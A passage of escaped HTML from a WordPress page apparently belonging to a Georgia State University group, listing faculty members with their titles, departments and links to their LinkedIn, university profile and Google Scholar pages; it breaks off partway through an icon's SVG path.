class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-984 style-local-182-c64 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-985-outer style-local-182-c65-outer\">\n            <div data-colibri-id=\"182-c65\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-985 style-local-182-c65 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c66\" class=\"h-global-transition-all h-heading style-986 style-local-182-c66 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-986 style-local-182-c66\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Faculty</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-971 style-local-182-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c4-outer\">\n            <div data-colibri-id=\"182-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c5\" class=\"d-block style-973 style-local-182-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742.jpg\" class=\"wp-image-1697 style-973-image style-local-182-c5-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c5-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c6\" class=\"h-global-transition-all h-heading style-974 style-local-182-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c6\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Chetan Tiwari</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c7\" class=\"h-text h-text-component style-975 style-local-182-c7 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Director</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c8\" class=\"h-text h-text-component style-976 style-local-182-c8 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c9\" class=\"style-977 style-local-182-c9 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=C5PVPkoAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c10-outer\">\n            <div data-colibri-id=\"182-c10\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c11\" class=\"d-block style-978 style-local-182-c11 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-Portrait-1-e1697202215204.jpeg\" class=\"wp-image-1701 style-978-image style-local-182-c11-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-978-frameImage style-local-182-c11-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c12\" class=\"h-global-transition-all h-heading style-974 style-local-182-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c12\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Armin Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c13\" class=\"h-text h-text-component style-975 style-local-182-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p> Chair and Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c14\" class=\"h-text h-text-component style-976 style-local-182-c14 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c15\" class=\"style-979 style-local-182-c15 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=41ckZZsAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c16-outer\">\n            <div data-colibri-id=\"182-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c17\" class=\"d-block style-980 style-local-182-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/sunderraman1.jpeg\" class=\"wp-image-692 style-980-image style-local-182-c17-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-980-frameImage style-local-182-c17-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c18\" class=\"h-global-transition-all h-heading style-974 style-local-182-c18 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c18\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Raj Sunderraman</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c19\" class=\"h-text h-text-component style-975 style-local-182-c19 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Chair and Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c20\" class=\"h-text h-text-component style-976 style-local-182-c20 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c21\" class=\"style-981 style-local-182-c21 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/raj-sunderraman-a5591bb2/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 